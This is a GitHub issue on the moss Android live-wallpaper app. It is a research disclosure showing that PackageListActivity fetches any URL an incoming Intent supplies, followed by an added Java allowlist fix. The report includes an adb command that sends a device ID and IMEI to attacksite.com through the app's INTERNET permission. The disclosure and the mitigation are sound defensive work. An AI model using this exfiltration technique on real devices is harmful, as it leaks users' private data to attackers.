teneighty / moss

Conky like live wallpaper for Android
Apache License 2.0

Inter-application vulnerability #3

Open biniamf opened 9 years ago

biniamf commented 9 years ago

Hi there,

This issue report is part of research. We have found that your application is vulnerable to inter-application communication. It can be replicated as follows:

adb shell 'am start "intent://attacksite.com/post.php?deviceid=123&imei=0123#Intent;scheme=http;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;component=org.mosspaper/.PackageListActivity;end"'

By automating this, an attacking app that does not have INTERNET permission can post sensitive information to the attacker's website.

The problem is in the PackageListActivity class, where the ACTION of the incoming Intent is checked in the handleIntents() method and the internet is then accessed at the URL in the download() method of the PackLoaderTask class, which effectively lets an attacker publish sensitive data to a given URL.

A given context is as follows: a malicious app without INTERNET permission but with other permissions (for example reading SMS) can use your application's INTERNET permission to pass sensitive data.

Can you please confirm this?

Thank you, Biniam
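
One way to close the path described in this report, as an added example that is not part of the original issue or the moss code base: vet the URL carried by the incoming Intent before `handleIntents()` hands it to `PackLoaderTask.download()`. The class name `IntentUrlPolicy`, the method `vet` and the host `themes.example.org` are assumptions made for illustration; it uses plain `java.net.URI` so it runs on any JVM, and inside the activity the input would be `getIntent().getDataString()`.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/** Hypothetical helper: decides whether a URL taken from an incoming Intent may be fetched. */
public final class IntentUrlPolicy {
    // Assumption: packages are only ever fetched from a small, known set of hosts (placeholder).
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("themes.example.org"));

    private IntentUrlPolicy() {}

    /** Returns the parsed URI if it may be downloaded, otherwise null. */
    public static URI vet(String dataString) {
        if (dataString == null) return null;
        final URI uri;
        try {
            uri = new URI(dataString);
        } catch (URISyntaxException e) {
            return null; // malformed input is refused, never "repaired"
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) return null;
        if (!"https".equals(scheme.toLowerCase(Locale.ROOT))) return null;
        if (!ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) return null;
        if (uri.getPort() != -1 && uri.getPort() != 443) return null;
        // A sending app controls every byte of the URL, so refuse the parts that
        // can smuggle data out: query string, fragment and userinfo.
        if (uri.getRawQuery() != null || uri.getRawFragment() != null
                || uri.getRawUserInfo() != null) return null;
        return uri;
    }

    public static void main(String[] args) {
        String[] samples = {
            "http://attacksite.com/post.php?deviceid=123&imei=0123", // URL from the report
            "https://themes.example.org/packs/default.zip",          // constructed sample
            "https://themes.example.org/packs/default.zip?imei=0123", // constructed sample
            "https://themes.example.org@attacksite.com/post.php"     // constructed sample
        };
        for (String s : samples) {
            System.out.println((vet(s) != null ? "ALLOW " : "DENY  ") + s);
        }
    }
}
```

Only the second sample is allowed. If the activity does not need to be launched by other apps at all, declaring it with `android:exported="false"` in the manifest removes the entry point entirely.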